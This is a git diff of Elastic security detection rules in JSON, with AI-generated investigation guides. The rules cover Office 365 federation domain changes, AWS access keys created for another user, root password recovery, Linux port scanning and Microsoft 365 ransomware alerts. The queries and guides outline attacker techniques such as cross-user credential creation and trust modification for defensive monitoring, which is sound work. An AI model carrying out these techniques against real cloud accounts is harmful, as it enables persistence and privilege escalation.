"New or Modified Federation Domain", - "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating New or Modified Federation Domain\n\nFederation domains enable trust between Office 365 and external identity providers, facilitating seamless authentication. Adversaries may exploit this by altering federation settings to redirect authentication flows, potentially gaining unauthorized access. The detection rule monitors specific actions like domain modifications, signaling potential privilege escalation attempts, and alerts analysts to investigate these changes.\n\n### Possible investigation steps\n\n- Review the event logs for the specific actions listed in the query, such as \"Set-AcceptedDomain\" or \"Add-FederatedDomain\", to identify the exact changes made to the federation domain settings.\n- Identify the user account associated with the event by examining the event logs, and verify if the account has the necessary permissions to perform such actions.\n- Check the event.outcome field to confirm the success of the action and cross-reference with any recent administrative changes or requests to validate legitimacy.\n- Investigate the event.provider and event.category fields to ensure the actions were performed through legitimate channels and not via unauthorized or suspicious methods.\n- Analyze the timing and frequency of the federation domain changes to detect any unusual patterns or repeated attempts that could indicate malicious activity.\n- Correlate the detected changes with any recent alerts or incidents involving privilege escalation or unauthorized access attempts to assess potential links or broader security implications.\n\n### False positive analysis\n\n- Routine administrative changes to federation domains by IT staff can trigger alerts. To manage this, create exceptions for known and scheduled maintenance activities by trusted administrators.\n- Automated scripts or tools used for domain management may cause false positives. Identify these scripts and exclude their actions from triggering alerts by whitelisting their associated accounts or IP addresses.\n- Integration of new services or applications that require federation domain modifications can be mistaken for suspicious activity. Document these integrations and adjust the rule to recognize these legitimate changes.\n- Changes made during organizational restructuring, such as mergers or acquisitions, might appear as unauthorized modifications. Coordinate with relevant departments to anticipate these changes and temporarily adjust monitoring thresholds or exclusions.\n- Regular audits or compliance checks that involve domain settings adjustments can lead to false positives. Schedule these audits and inform the security team to prevent unnecessary alerts.\n\n### Response and remediation\n\n- Immediately disable any newly added or modified federation domains to prevent unauthorized access. This can be done using the appropriate administrative tools in Office 365.\n- Review and revoke any suspicious or unauthorized access tokens or sessions that may have been issued through the compromised federation domain.\n- Conduct a thorough audit of recent administrative actions and access logs to identify any unauthorized changes or access patterns related to the federation domain modifications.\n- Escalate the incident to the security operations team for further investigation and to determine if additional containment measures are necessary.\n- Implement additional monitoring on federation domain settings to detect any further unauthorized changes promptly.\n- Communicate with affected stakeholders and provide guidance on any immediate actions they need to take, such as password resets or additional authentication steps.\n- Review and update federation domain policies and configurations to ensure they align with best practices and reduce the risk of similar incidents in the future.", - "query": "event.dataset:o365.audit and event.provider:Exchange and event.category:web and event.action:(\"Set-AcceptedDomain\" or\n\"Set-MsolDomainFederationSettings\" or \"Add-FederatedDomain\" or \"New-AcceptedDomain\" or \"Remove-AcceptedDomain\" or \"Remove-FederatedDomain\") and\nevent.outcome:success\n", - "references": [ - "https://docs.microsoft.com/en-us/powershell/module/exchange/remove-accepteddomain?view=exchange-ps", - "https://docs.microsoft.com/en-us/powershell/module/exchange/remove-federateddomain?view=exchange-ps", - "https://docs.microsoft.com/en-us/powershell/module/exchange/new-accepteddomain?view=exchange-ps", - "https://docs.microsoft.com/en-us/powershell/module/exchange/add-federateddomain?view=exchange-ps", - "https://docs.microsoft.com/en-us/powershell/module/exchange/set-accepteddomain?view=exchange-ps", - "https://docs.microsoft.com/en-us/powershell/module/msonline/set-msoldomainfederationsettings?view=azureadps-1.0" - ], - "related_integrations": [ - { - "package": "o365", - "version": "^2.0.0" - } - ], - "required_fields": [ - { - "ecs": true, - "name": "event.action", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.category", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.dataset", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.outcome", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.provider", - "type": "keyword" - } - ], - "risk_score": 21, - "rule_id": "684554fc-0777-47ce-8c9b-3d01f198d7f8", - "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "severity": "low", - "tags": [ - "Domain: Cloud", - "Data Source: Microsoft 365", - "Use Case: Identity and Access Audit", - "Tactic: Privilege Escalation", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0004", - "name": "Privilege Escalation", - "reference": "https://attack.mitre.org/tactics/TA0004/" - }, - "technique": [ - { - "id": "T1484", - "name": "Domain or Tenant Policy Modification", - "reference": "https://attack.mitre.org/techniques/T1484/", - "subtechnique": [ - { - "id": "T1484.002", - "name": "Trust Modification", - "reference": "https://attack.mitre.org/techniques/T1484/002/" - } - ] - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "query", - "version": 208 - }, - "id": "684554fc-0777-47ce-8c9b-3d01f198d7f8_208", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/696015ef-718e-40ff-ac4a-cc2ba88dbeeb_8.json b/packages/security_detection_engine/kibana/security_rule/696015ef-718e-40ff-ac4a-cc2ba88dbeeb_8.json new file mode 100644 index 00000000000..e54cb93b1a3 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/696015ef-718e-40ff-ac4a-cc2ba88dbeeb_8.json @@ -0,0 +1,112 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "An adversary with access to a set of compromised credentials may attempt to persist or escalate privileges by creating a new set of credentials for an existing user. This rule looks for use of the IAM `CreateAccessKey` API operation to create new programmatic access keys for another IAM user.", + "false_positives": [ + "While this can be normal behavior, it should be investigated to ensure validity. Verify whether the user identity should be using the IAM `CreateAccessKey` for the targeted user." + ], + "from": "now-6m", + "investigation_fields": { + "field_names": [ + "@timestamp", + "user.name", + "user_agent.original", + "source.ip", + "aws.cloudtrail.user_identity.arn", + "aws.cloudtrail.user_identity.type", + "aws.cloudtrail.user_identity.access_key_id", + "user.target.name", + "event.action", + "event.outcome", + "cloud.region", + "cloud.account.id", + "aws.cloudtrail.request_parameters", + "aws.cloudtrail.response_elements" + ] + }, + "language": "esql", + "license": "Elastic License v2", + "name": "AWS IAM User Created Access Keys For Another User", + "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n\n### Investigating AWS IAM User Created Access Keys For Another User\n\nAWS IAM access keys are long-term credentials that grant programmatic access to AWS resources. The `iam:CreateAccessKey` permission allows an IAM principal to generate new access keys for an existing IAM user. \nWhile this operation can be legitimate (for example, credential rotation), it can also be abused to establish persistence or privilege escalation if one user creates keys for another account without authorization.\n\nThis rule identifies `CreateAccessKey` API calls where the calling user (`aws.cloudtrail.user_identity.arn`) differs from the target user (`aws.cloudtrail.request_parameters.userName`), indicating one IAM identity creating credentials for another.\n\n#### Possible investigation steps\n\n- **Confirm both user identities and intent.** \n Identify the calling user (who performed `CreateAccessKey`) and the target user (whose access key was created). Contact both account owners or application teams to confirm if this operation was expected.\n\n- **Review CloudTrail event details.** \n Check the following fields directly in the alert or corresponding CloudTrail record: \n - `source.ip` \u2014 does it align with expected corporate ranges or known admin automation? \n - `user_agent.original` \u2014 AWS Console, CLI, SDK, or custom client? Unexpected user agents (for example, non-SDK scripts) may indicate manual or unauthorized use. \n - `source.geo` fields \u2014 verify the location details are expected for the identity.\n\n- **Correlate with related IAM activity.** \n In CloudTrail, search for subsequent or nearby events such as: \n - `AttachUserPolicy`, `AttachGroupPolicy`, `UpdateAssumeRolePolicy`, or `CreateUser`. \n These can indicate privilege escalation or lateral movement. \n Also review whether the same principal recently performed `CreateAccessKey` for multiple users or repeated this action across accounts.\n\n- **Inspect the new access key\u2019s usage.** \n Search for the newly created key ID (`aws.cloudtrail.response_elements.accessKey.accessKeyId`) in CloudTrail events following creation. Determine if it was used from unusual IP addresses, geographies, or services. \n\n- **Assess the risk of credential compromise.** \n If you suspect malicious behavior, consider the following indicators: \n - A non-admin user invoking `CreateAccessKey` for another user. \n - Creation outside of normal automation pipelines. \n - Use of the new key from a different IP or AWS account soon after creation.\n\n- **Scope related activity.** \n Review all activity from the calling user in the past 24\u201348 hours, focusing on `iam:*` API calls and resource creation events. \n Correlate any S3, EC2, or KMS access attempts made using the new key to identify potential impact or data exposure.\n\n### False positive analysis\n\n- **Expected credential rotation.** \n Some environments delegate credential rotation responsibilities to centralized automation or specific admin roles. Confirm if the calling user is authorized for such actions. \n- **Administrative workflows.** \n Account provisioning systems may legitimately create keys on behalf of users. Check for standard tags, automation tools, or user agents that indicate managed operations. \n- **Service-linked roles or external IAM automation.** \n Some AWS services create or rotate credentials automatically. Validate if the caller is a service-linked role or an automation IAM role used by a known deployment process.\n\n### Response and remediation\n\n> AWS IR playbooks classify unauthorized credential creation as a **Priority-1 incident** because it may allow persistence or privilege escalation. \n> The following steps scale for organizations with or without a dedicated IR team.\n\n**1. Immediate containment**\n- Deactivate or delete the access key from the target IAM user immediately using the AWS Console, CLI, or API (`DeleteAccessKey`). \n- Rotate or reset credentials for both the calling and target users to eliminate possible compromise. \n- Restrict risky principals. Temporarily deny `iam:CreateAccessKey` and `iam:UpdateAccessKey` permissions for non-administrative roles while scoping the incident. \n- Enable or confirm MFA on both accounts involved, if not already enforced.\n\n**2. Evidence preservation**\n- Export all related `CreateAccessKey`, `DeleteAccessKey`, and `UpdateAccessKey` events within \u00b130 minutes of the alert to an evidence bucket. \n- Preserve CloudTrail, GuardDuty, and AWS Config data for the same period. \n- Record key event details: caller ARN, target user, `accessKeyId`, `source.ip`, `userAgent`, and timestamps.\n\n**3. Scoping and investigation**\n- Search CloudTrail for usage of the new access key ID after creation. Identify any API activity or data access tied to it. \n- Review IAM policy changes, group modifications, or new role assumptions around the same time. \n- Determine if any additional credentials or trust policy changes were made by the same actor. \n- Check for GuardDuty findings referencing anomalous credential usage or suspicious API behavior.\n\n**4. Recovery and hardening**\n- Remove or disable any unauthorized keys and re-enable only verified credentials. \n- Implement least-privilege IAM policies to limit which users can perform `CreateAccessKey`. \n- Monitor for future `CreateAccessKey` events where `userIdentity.arn != request_parameters.userName`. \n- Ensure Cloudtrail, GuardDuty and Security Hub are active across all regions. \n- Educate administrative users on secure key rotation processes and the risk of cross-user key creation. \n\n### Additional information\n\n- **[AWS IR Playbooks](https://github.com/aws-samples/aws-incident-response-playbooks/blob/c151b0dc091755fffd4d662a8f29e2f6794da52c/playbooks/):** Reference \u201cCredential Compromise\u201d and \u201cIAM Misuse\u201d procedures for containment and recovery. \n- **[AWS Customer Playbook Framework](https://github.com/aws-samples/aws-customer-playbook-framework/):** See \u201cIdentity Access Review\u201d and \u201cUnauthorized Access Key Creation\u201d for example response flows. \n- **AWS Documentation:** [Best practices for managing access keys](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_credentials_access-keys.html). \n- **Security Best Practices:** [AWS Knowledge Center \u2013 Security Best Practices](https://aws.amazon.com/premiumsupport/knowledge-center/security-best-practices/). \n", + "query": "from logs-aws.cloudtrail-* metadata _id, _version, _index\n| where event.dataset == \"aws.cloudtrail\"\n and event.provider == \"iam.amazonaws.com\"\n and event.action == \"CreateAccessKey\"\n and event.outcome == \"success\"\n and user.name != user.target.name\n| keep\n @timestamp,\n cloud.account.id,\n cloud.region,\n event.provider,\n event.action,\n event.outcome,\n event.dataset,\n user.name,\n source.address,\n source.ip,\n user.target.name,\n user_agent.original,\n aws.cloudtrail.request_parameters,\n aws.cloudtrail.response_elements,\n aws.cloudtrail.user_identity.arn,\n aws.cloudtrail.user_identity.type,\n aws.cloudtrail.user_identity.access_key_id,\n source.geo.*\n", + "references": [ + "https://hackingthe.cloud/aws/exploitation/iam_privilege_escalation/#iamcreateaccesskey", + "https://cloud.hacktricks.xyz/pentesting-cloud/aws-security/aws-persistence/aws-iam-persistence", + "https://permiso.io/blog/lucr-3-scattered-spider-getting-saas-y-in-the-cloud", + "https://docs.aws.amazon.com/IAM/latest/APIReference/API_CreateAccessKey.html" + ], + "related_integrations": [ + { + "integration": "cloudtrail", + "package": "aws", + "version": "^4.0.0" + } + ], + "risk_score": 47, + "rule_id": "696015ef-718e-40ff-ac4a-cc2ba88dbeeb", + "severity": "medium", + "tags": [ + "Domain: Cloud", + "Data Source: AWS", + "Data Source: Amazon Web Services", + "Data Source: AWS IAM", + "Use Case: Identity and Access Audit", + "Tactic: Privilege Escalation", + "Tactic: Persistence", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1098", + "name": "Account Manipulation", + "reference": "https://attack.mitre.org/techniques/T1098/", + "subtechnique": [ + { + "id": "T1098.001", + "name": "Additional Cloud Credentials", + "reference": "https://attack.mitre.org/techniques/T1098/001/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1098", + "name": "Account Manipulation", + "reference": "https://attack.mitre.org/techniques/T1098/", + "subtechnique": [ + { + "id": "T1098.001", + "name": "Additional Cloud Credentials", + "reference": "https://attack.mitre.org/techniques/T1098/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "esql", + "version": 8 + }, + "id": "696015ef-718e-40ff-ac4a-cc2ba88dbeeb_8", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/69c420e8-6c9e-4d28-86c0-8a2be2d1e78c_210.json b/packages/security_detection_engine/kibana/security_rule/69c420e8-6c9e-4d28-86c0-8a2be2d1e78c_210.json new file mode 100644 index 00000000000..6aa9ff79bf3 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/69c420e8-6c9e-4d28-86c0-8a2be2d1e78c_210.json @@ -0,0 +1,98 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies a password recovery request for the AWS account root user. In AWS, the PasswordRecoveryRequested event from signin.amazonaws.com applies to the root user\u2019s \u201cForgot your password?\u201d flow. Other identity types, like IAM and federated users, do not generate this event. This alert indicates that someone initiated the root password reset workflow for this account. Verify whether this was an expected action and review identity provider notifications/email to confirm legitimacy.", + "from": "now-6m", + "index": [ + "filebeat-*", + "logs-aws.cloudtrail-*" + ], + "investigation_fields": { + "field_names": [ + "@timestamp", + "user_agent.original", + "source.ip", + "aws.cloudtrail.user_identity.arn", + "aws.cloudtrail.user_identity.type", + "event.action", + "event.outcome", + "cloud.account.id", + "cloud.region", + "aws.cloudtrail.response_elements" + ] + }, + "language": "kuery", + "license": "Elastic License v2", + "name": "AWS Sign-In Root Password Recovery Requested", + "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating AWS Sign-In Root Password Recovery Requested\n\nIn AWS, a `PasswordRecoveryRequested` event from `signin.amazonaws.com` is only generated for the root user during the \u201cForgot your password?\u201d workflow. Other identity types (IAM or federated users) do not trigger this event. A root password recovery request is a critical identity security event that could indicate a legitimate recovery by the account owner or a malicious attempt to gain full administrative access.\n\n### Possible investigation steps\n\n- **Verify the event details.** \n Review the alert fields (`source.ip`, `user_agent.original`, `cloud.region`, and `@timestamp`) to confirm when and from where the request originated.\n- **Confirm legitimacy.** \n Contact the account owner or credential custodian to verify whether they initiated the password recovery. \n AWS will also send an email notification to the root account email address, check whether the owner received and acknowledged this.\n- **Check CloudTrail for related events.** \n Search for any subsequent `ConsoleLogin` events for the root user, or IAM changes (for example, `CreateAccessKey`, `CreateUser`, or `AttachUserPolicy`) shortly after the recovery request.\n- **Assess IP reputation and location.** \n Validate whether the `source.ip` aligns with known admin networks or expected geographies. \n Suspicious indicators include foreign IPs, anonymization services, or unfamiliar user agents.\n- **Correlate with other alerts.** \n Review other AWS security detections (for example, root logins, MFA disablement, or IAM policy changes) around the same timeframe.\n\n### False positive analysis\n\n- **Expected maintenance activity.** \n If the root account owner confirms that the password reset was intentional (for example, for account recovery or planned credential rotation), the alert may be safely dismissed. \n- **Testing or account verification.** \n Security or compliance teams occasionally test password recovery flows. Confirm via ticketing or planned maintenance documentation.\n\n### Response and remediation\n\n**1. Immediate actions**\n- **If confirmed legitimate:** \n - Ensure that MFA is enabled and operational for the root account. \n - Encourage rotation of the root password if not recently updated. \n- **If unconfirmed or suspicious:** \n - Immediately reset the root password using the legitimate AWS recovery email link. \n - Review the AWS account\u2019s email for password-recovery notifications and secure that inbox (change its password, enable MFA). \n - Check for new successful root logins or unexpected IAM changes since the recovery attempt. \n\n**2. Evidence preservation**\n- Export the `PasswordRecoveryRequested` event from CloudTrail (\u00b130 minutes). \n- Preserve all `signin.amazonaws.com` and root `ConsoleLogin` events for the next 24 hours. \n- Store this evidence in a restricted S3 bucket with Object Lock enabled.\n\n**3. Scoping and investigation**\n- Review all root-level activities within the past 24\u201348 hours. \n Focus on administrative actions such as `CreateAccessKey`, `UpdateAccountPasswordPolicy`, or `DisableMFA`. \n- Correlate with GuardDuty findings and AWS Config change history for any unauthorized modifications.\n\n**4. Recovery and hardening**\n- Confirm MFA is enforced on the root account. \n- Rotate all root credentials and ensure no access keys exist for the root user (root keys should never be active). \n- Secure the associated email account (password reset notifications are sent there). \n- Enable Cloudtrail, GuardDuty, Security Hub, and AWS Config across all regions. \n- Review account recovery procedures to ensure multiple custodians are aware of the legitimate process.\n\n### Additional information\n\n- **AWS Incident Response Playbooks:** \n and [`IRP-Credential-Compromise.md`](https://github.com/aws-samples/aws-incident-response-playbooks/blob/c151b0dc091755fffd4d662a8f29e2f6794da52c/playbooks/IRP-CredCompromise.md) for procedures related to root account credential recovery and unauthorized access attempts. \n- **AWS Customer Playbook Framework:** \n See [`Compromised_IAM_Credentials.md`](https://github.com/aws-samples/aws-customer-playbook-framework/blob/a8c7b313636b406a375952ac00b2d68e89a991f2/docs/Compromised_IAM_Credentials.md) for guidance on containment, evidence collection, and recovery validation. \n- **AWS Documentation:** [AWS account root user best practices](https://docs.aws.amazon.com/IAM/latest/UserGuide/root-user-best-practices.html). \n- **Security Best Practices:** [AWS Knowledge Center \u2013 Security Best Practices](https://aws.amazon.com/premiumsupport/knowledge-center/security-best-practices/). \n", + "query": "event.dataset:aws.cloudtrail and \nevent.provider:signin.amazonaws.com and \nevent.action:PasswordRecoveryRequested and \nevent.outcome:success\n", + "references": [ + "https://web.archive.org/web/20230930161727/https://www.cadosecurity.com/an-ongoing-aws-phishing-campaign/" + ], + "related_integrations": [ + { + "integration": "cloudtrail", + "package": "aws", + "version": "^4.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "69c420e8-6c9e-4d28-86c0-8a2be2d1e78c", + "severity": "high", + "tags": [ + "Domain: Cloud", + "Data Source: AWS", + "Data Source: Amazon Web Services", + "Data Source: AWS Sign-In", + "Use Case: Identity and Access Audit", + "Tactic: Initial Access", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0001", + "name": "Initial Access", + "reference": "https://attack.mitre.org/tactics/TA0001/" + }, + "technique": [ + { + "id": "T1078", + "name": "Valid Accounts", + "reference": "https://attack.mitre.org/techniques/T1078/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 210 + }, + "id": "69c420e8-6c9e-4d28-86c0-8a2be2d1e78c_210", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/6b341d03-1d63-41ac-841a-2009c86959ca_4.json b/packages/security_detection_engine/kibana/security_rule/6b341d03-1d63-41ac-841a-2009c86959ca_4.json deleted file mode 100644 index a788cd5431e..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/6b341d03-1d63-41ac-841a-2009c86959ca_4.json +++ /dev/null @@ -1,55 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "This rule detects potential port scanning activity from a compromised host. Port scanning is a common reconnaissance technique used by attackers to identify open ports and services on a target system. A compromised host may exhibit port scanning behavior when an attacker is attempting to map out the network topology, identify vulnerable services, or prepare for further exploitation. This rule identifies potential port scanning activity by monitoring network connection attempts from a single host to a large number of ports within a short time frame. ESQL rules have limited fields available in its alert documents. Make sure to review the original documents to aid in the investigation of this alert.", - "from": "now-61m", - "interval": "1h", - "language": "esql", - "license": "Elastic License v2", - "name": "Potential Port Scanning Activity from Compromised Host", - "note": " ## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Potential Port Scanning Activity from Compromised Host\n\nPort scanning is a reconnaissance method used by attackers to identify open ports and services on a network, often as a precursor to exploitation. In Linux environments, compromised hosts may perform rapid connection attempts to numerous ports, signaling potential scanning activity. The detection rule identifies such behavior by analyzing network logs for a high number of distinct port connections from a single host within a short timeframe, indicating possible malicious intent.\n\n### Possible investigation steps\n\n- Review the network logs to identify the specific host exhibiting the port scanning behavior by examining the destination.ip and process.executable fields.\n- Analyze the @timestamp field to determine the exact time frame of the scanning activity and correlate it with any other suspicious activities or alerts from the same host.\n- Investigate the process.executable field to understand which application or service initiated the connection attempts, and verify if it is a legitimate process or potentially malicious.\n- Check the destination.port field to identify the range and types of ports targeted by the scanning activity, which may provide insights into the attacker's objectives or the services they are interested in.\n- Assess the host's security posture by reviewing recent changes, installed software, and user activity to determine if the host has been compromised or if the scanning is part of legitimate network operations.\n- Consult the original documents and logs for additional context and details that may not be captured in the alert to aid in a comprehensive investigation.\n\n### False positive analysis\n\n- Legitimate network scanning tools used by system administrators for network maintenance or security assessments can trigger this rule. To handle this, identify and whitelist the IP addresses or processes associated with these tools.\n- Automated vulnerability scanners or monitoring systems that perform regular checks on network services may cause false positives. Exclude these systems by creating exceptions for their known IP addresses or process names.\n- High-volume legitimate services that open multiple connections to different ports, such as load balancers or proxy servers, might be flagged. Review and exclude these services by specifying their IP addresses or process executables.\n- Development or testing environments where frequent port scanning is part of routine operations can be mistakenly identified. Implement exceptions for these environments by excluding their specific network segments or host identifiers.\n- Scheduled network discovery tasks that are part of IT operations can mimic port scanning behavior. Document and exclude these tasks by setting up time-based exceptions or identifying their unique process signatures.\n\n### Response and remediation\n\n- Isolate the compromised host from the network immediately to prevent further scanning and potential lateral movement.\n- Terminate any suspicious processes identified by the process.executable field to halt ongoing malicious activities.\n- Conduct a thorough review of the compromised host's system logs and network traffic to identify any unauthorized access or data exfiltration attempts.\n- Patch and update all software and services on the compromised host to close any vulnerabilities that may have been exploited.\n- Change all credentials associated with the compromised host and any potentially affected systems to prevent unauthorized access.\n- Monitor the network for any further signs of scanning activity or other suspicious behavior from other hosts, indicating potential additional compromises.\n- Escalate the incident to the security operations team for further investigation and to determine if additional systems are affected.\n", - "query": "from logs-endpoint.events.network-*\n| keep @timestamp, host.os.type, event.type, event.action, destination.port, process.executable, destination.ip, agent.id, host.name\n| where @timestamp > now() - 1 hours\n| where host.os.type == \"linux\" and event.type == \"start\" and event.action == \"connection_attempted\"\n| stats cc = count(), port_count = count_distinct(destination.port), agent_count = count_distinct(agent.id), host.name = VALUES(host.name), agent.id = VALUES(agent.id) by process.executable, destination.ip\n| where agent_count == 1 and port_count > 100\n| sort cc asc\n| limit 100\n", - "related_integrations": [ - { - "package": "endpoint", - "version": "^8.2.0" - } - ], - "risk_score": 21, - "rule_id": "6b341d03-1d63-41ac-841a-2009c86959ca", - "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", - "severity": "low", - "tags": [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Discovery", - "Data Source: Elastic Defend", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0007", - "name": "Discovery", - "reference": "https://attack.mitre.org/tactics/TA0007/" - }, - "technique": [ - { - "id": "T1046", - "name": "Network Service Discovery", - "reference": "https://attack.mitre.org/techniques/T1046/" - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "esql", - "version": 4 - }, - "id": "6b341d03-1d63-41ac-841a-2009c86959ca_4", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/721999d0-7ab2-44bf-b328-6e63367b9b29_207.json b/packages/security_detection_engine/kibana/security_rule/721999d0-7ab2-44bf-b328-6e63367b9b29_207.json deleted file mode 100644 index de808a405e8..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/721999d0-7ab2-44bf-b328-6e63367b9b29_207.json +++ /dev/null @@ -1,91 +0,0 @@ -{ - "attributes": { - "author": [ - "Austin Songer" - ], - "description": "Identifies when Microsoft Cloud App Security reports that a user has uploaded files to the cloud that might be infected with ransomware.", - "false_positives": [ - "If Cloud App Security identifies, for example, a high rate of file uploads or file deletion activities it may represent an adverse encryption process." - ], - "from": "now-30m", - "index": [ - "filebeat-*", - "logs-o365*" - ], - "language": "kuery", - "license": "Elastic License v2", - "name": "Microsoft 365 Potential ransomware activity", - "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Microsoft 365 Potential ransomware activity\n\nMicrosoft 365's cloud services can be exploited by adversaries to distribute ransomware by uploading infected files. This detection rule leverages Microsoft Cloud App Security to identify suspicious uploads, focusing on successful events flagged as potential ransomware activity. By monitoring specific event datasets and actions, it helps security analysts pinpoint and mitigate ransomware threats, aligning with MITRE ATT&CK's impact tactics.\n\n### Possible investigation steps\n\n- Review the event details in the Microsoft Cloud App Security console to confirm the specific files and user involved in the \"Potential ransomware activity\" alert.\n- Check the event.dataset field for o365.audit logs to gather additional context about the user's recent activities and any other related events.\n- Investigate the event.provider field to ensure the alert originated from the SecurityComplianceCenter, confirming the source of the detection.\n- Analyze the event.category field to verify that the activity is categorized as web, which may indicate the method of file upload.\n- Assess the user's recent activity history and permissions to determine if the upload was intentional or potentially malicious.\n- Contact the user to verify the legitimacy of the uploaded files and gather any additional context or explanations for the activity.\n- If the files are confirmed or suspected to be malicious, initiate a response plan to contain and remediate any potential ransomware threat, including isolating affected systems and notifying relevant stakeholders.\n\n### False positive analysis\n\n- Legitimate file uploads by trusted users may trigger alerts if the files are mistakenly flagged as ransomware. To manage this, create exceptions for specific users or groups who frequently upload large volumes of files.\n- Automated backup processes that upload encrypted files to the cloud can be misidentified as ransomware activity. Exclude these processes by identifying and whitelisting the associated service accounts or IP addresses.\n- Certain file types or extensions commonly used in business operations might be flagged. Review and adjust the detection rule to exclude these file types if they are consistently identified as false positives.\n- Collaborative tools that sync files across devices may cause multiple uploads that appear suspicious. Monitor and exclude these tools by recognizing their typical behavior patterns and adjusting the rule settings accordingly.\n- Regularly review and update the list of exceptions to ensure that only verified non-threatening activities are excluded, maintaining the balance between security and operational efficiency.\n\n### Response and remediation\n\n- Immediately isolate the affected user account to prevent further uploads and potential spread of ransomware within the cloud environment.\n- Quarantine the uploaded files flagged as potential ransomware to prevent access and further distribution.\n- Conduct a thorough scan of the affected user's devices and cloud storage for additional signs of ransomware or other malicious activity.\n- Notify the security operations team to initiate a deeper investigation into the source and scope of the ransomware activity, leveraging MITRE ATT&CK techniques for guidance.\n- Restore any affected files from secure backups, ensuring that the backups are clean and free from ransomware.\n- Review and update access controls and permissions for the affected user and related accounts to minimize the risk of future incidents.\n- Escalate the incident to senior security management and, if necessary, involve legal or compliance teams to assess any regulatory implications.", - "query": "event.dataset:o365.audit and event.provider:SecurityComplianceCenter and event.category:web and event.action:\"Potential ransomware activity\" and event.outcome:success\n", - "references": [ - "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy", - "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference" - ], - 